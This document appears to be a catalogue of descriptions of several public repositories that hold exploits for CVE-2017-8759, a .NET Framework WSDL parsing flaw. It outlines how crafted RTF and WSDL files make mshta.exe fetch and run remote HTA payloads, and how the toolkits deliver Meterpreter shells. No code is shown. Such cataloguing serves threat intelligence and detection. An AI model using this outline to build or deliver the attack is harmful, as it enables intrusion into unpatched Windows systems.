.NET Framework WSDL Parsing Remote Code Execution

This repository provides a proof-of-concept exploit for CVE-2017-8759, a vulnerability in Microsoft Office (specifically PowerPoint) that allows remote code execution via maliciously crafted OOXML (PPTX/PPSX) files. The exploit demonstrates how a SOAP WSDL file can be manipulated to trigger mshta.exe to fetch and execute a remote HTA payload (w00t.hta), which in turn runs arbitrary code (calc.exe) on the victim's system using VBScript and WMI. The repository includes the main exploit components (logo.png as a crafted WSDL, w00t.hta as the payload), a detailed README explaining the exploitation technique and context, and several YARA rules for detection of related malicious documents. The attack vector is primarily network-based (malicious document delivery and remote payload fetching), but also leverages local execution via mshta.exe. The exploit is a proof-of-concept and does not include weaponized or customizable payloads beyond the demonstration of code execution.

This repository contains a Python exploit toolkit for CVE-2017-8759, a remote code execution vulnerability in Microsoft .NET Framework. The toolkit (cve-2017-8759_toolkit.py) allows an attacker to generate a malicious RTF file that, when opened by a victim, triggers a SOAP WSDL request to an attacker-controlled server. The attacker can then deliver and execute arbitrary payloads (such as Meterpreter shells) on the victim's Windows system. The script supports two main modes: generating the malicious RTF file (embedding a remote URL) and exploitation mode (serving the payload to the victim). The README provides detailed usage instructions, including example commands and payload generation steps. The exploit is operational and can be used to achieve remote code execution on unpatched Windows systems running vulnerable versions of .NET Framework. The main entry point is the Python script, which handles both RTF generation and payload delivery. The exploit requires the attacker to specify URLs and file paths for payload delivery, making it flexible for different attack scenarios.

This repository is a proof-of-concept exploit for CVE-2017-8759, a remote code execution vulnerability in Microsoft .NET Framework when processing untrusted SOAP WSDL input. The repository contains three files: a README.md explaining the vulnerability and affected .NET Framework versions, a malicious RTF file (cve-2017-8759.rtf) designed to trigger the exploit when opened in Microsoft Word, and an Exploit.png file which actually contains embedded XML/SOAP/WSDL code (not an image) that demonstrates the attack vector. The exploit abuses the way .NET deserializes SOAP WSDL, allowing an attacker to execute arbitrary code (such as launching mshta.exe to fetch and run a remote HTA script). The attacker must host a web server to serve the payload, and the victim must open the malicious RTF document. The exploit targets multiple versions of Microsoft .NET Framework on Windows. The repository does not include a weaponized payload, but provides a working POC for the exploit chain.

This repository provides a proof-of-concept (PoC) exploit for CVE-2017-8759, a vulnerability in Microsoft .NET Framework's SOAP WSDL parsing. The repository contains two files: a README.md with background and credits, and exploit.txt, which is a maliciously crafted WSDL (XML) file. The exploit leverages a <soap:address> element to invoke mshta.exe on the target Windows system, instructing it to fetch and execute a remote payload (e.g., https://example.com/cmd.jpg). The exploit demonstrates how an attacker can achieve arbitrary code execution on a vulnerable system by getting the target to process this WSDL file. The repository does not include a full weaponized payload, but provides the structure necessary for weaponization. No detection scripts are present; the content is focused on exploitation.

This repository is a proof-of-concept exploit for CVE-2017-8759, a vulnerability in the Microsoft .NET Framework WSDL parser that allows remote code execution. The exploit chain involves a malicious Word document macro that downloads a specially crafted WSDL (exploit.txt) from a web server. The WSDL triggers the vulnerable parser, which results in the execution of mshta.exe to run a remote HTA file (cmd.hta). The HTA file contains VBScript that uses WMI to launch a PowerShell command, which in this sample runs mspaint.exe. The repository includes: - 'server.py': a simple Python HTTP server to host the exploit files. - 'exploit.txt': the malicious WSDL file that triggers the exploit. - 'cmd.hta': the payload file containing VBScript to execute the command. - 'README.md': instructions and background on the exploit. The exploit is a POC and demonstrates code execution (launching mspaint.exe) on a vulnerable Windows system. The main fingerprintable endpoints are the local HTTP server (http://127.0.0.1:8080), the mshta.exe binary, and the cmd.hta payload. The exploit requires user interaction (opening a malicious document) and a vulnerable configuration.

This repository is an exploit toolkit for CVE-2017-8759, a remote code execution vulnerability in Microsoft .NET Framework (versions 2.0 through 4.7). The main code file (CVE.cs) is a C# program that generates a malicious RTF document. The user provides the path to a shell executable and an output file location; the tool embeds the shell path into a specially crafted RTF payload. When the generated RTF file is opened on a vulnerable system, it triggers the exploit, resulting in execution of the specified shell. The repository includes standard Visual Studio project files, a README with usage instructions, and references to the developer's website and the original exploit. The exploit is operational, requiring the attacker to craft and deliver the malicious document to a target running a vulnerable version of .NET Framework on Windows.